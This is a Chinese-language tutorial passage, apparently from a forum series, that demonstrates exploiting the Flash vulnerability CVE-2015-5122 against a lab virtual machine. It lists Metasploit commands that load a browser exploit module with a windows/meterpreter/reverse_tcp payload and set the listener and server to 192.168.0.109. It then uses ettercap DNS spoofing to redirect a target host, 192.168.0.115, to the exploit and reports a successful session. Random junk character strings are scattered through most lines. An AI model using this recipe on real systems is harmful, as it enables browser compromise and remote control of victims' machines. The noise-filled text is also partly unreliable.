* _7 r5 k. q3 m+ r# L6 ]7 v3 M
二、cve2015-5122漏洞实例演示虚拟机
5 r5 A! ]5 q6 n - t9 l) w" U) E" G
0 c8 _* g0 ~4 M w) L4 d; ` 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 9 l) ~9 m1 M8 G
" f; f$ K g9 Z
) u5 t+ p: E2 m7 j
search cve-2015-5122如图:
0 [: s6 {/ g$ D: \2 c 9 R- C0 U7 L' q2 `0 u7 V% i5 R
2 e; b* |- ~6 v0 C- {9 X* n- A8 B8 k
& R" Y# J8 M/ z+ m
5 p: {& H1 b( \! c8 j
& O% `- N9 D" V) a' w 下面我们敲如下命令: 1 s' s. m5 l; @
; p! e! c$ s& P! z6 K% A
$ |, ]0 Q: @5 W6 G3 ]' W use exploit/multi/browser/adobe_flash_opaque_background_uaf / v; f8 z1 @- {' @4 [/ s1 s. a
I/ k' {4 U3 [6 G U4 S( D/ C/ S2 Z5 l4 J) Y1 h/ N
set PAYLOAD windows/meterpreter/reverse_tcp 4 \! ?& u- m; |
: u, E/ v z; l: F" n) R# z
I" g$ R9 ^4 a v/ q set LHOST 192.168.0.109
9 w% X9 h& ?( M" ^ ! O m/ D: v0 }1 r1 B6 z
/ X- } z; f) Z. w# A% f* ` set URIPATH / /*根目录*/
- o: w c* M9 ], I3 [! Z
) ^% d# A1 z7 Z& l" @8 q
# O; x7 a3 J3 _9 l3 \ set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 ( u# ]+ v' y$ q" [! V7 L/ a# K3 B
: \$ l' ~6 _/ u. x7 N9 R0 s- `6 j* y
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
9 f+ T8 P$ W- P! F
. B \1 g: D$ @8 Q- s+ ?
: F% h5 `) u6 x4 Y/ T 然后show options如图:
, D8 t0 U* T, f9 n: Y% D0 u! N
' Z, M5 g( o6 U# r$ V$ Z$ y! L. _+ v8 S' j w9 Y3 \5 C
# |# c# g6 y' `
9 M6 ?* ?$ a7 r' R6 A6 O- v: k0 P( z! ?4 [
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: ) C9 { h' d8 F; o
7 F# U2 V" P% Q2 n, l# `2 y& ~ ( d- P9 D" u# M8 |
4 X+ q6 {! `9 d) A5 |! k/ w9 B6 ?" ` 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 % S- i5 u( G) J% ^
# x! I3 A1 C7 g9 {3 B2 w
f" e& L2 k; Q Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 4 Q& e( p7 w& R) Z
; m, e" ~: x8 f$ `. L3 g
% R7 v& M9 e" f7 F" s
- O9 `! H0 ^& R' m- h' \( D $ r$ V2 E0 V- k# E% V1 |, e
& d5 h. M1 K( g0 `0 N0 E/ }
成功了,这时候我们断开ettercap,如图:
e% W. u. G( H4 B( P# B' G: l
$ R c$ w- D) c& [) z1 q
9 G- x- E6 W/ s& { ( \$ u6 c8 O& m2 E j! k; @8 ]
$ a6 S$ ]2 {/ y5 l
. x# A/ N) E" y. A
Screenshot如图: - j9 C. g$ P8 L9 ]$ {% w% y% ^
- D1 u) c& ]9 W; [- N" M
1 S: b2 e% Y. w7 m- e E( @
" x% B( Q4 [0 z/ B' o( \& z l
$ ^8 F1 l* p+ A0 D* k7 M: ?9 q0 K6 h
* g9 g% [5 \. y5 V, y- d6 b2 R
|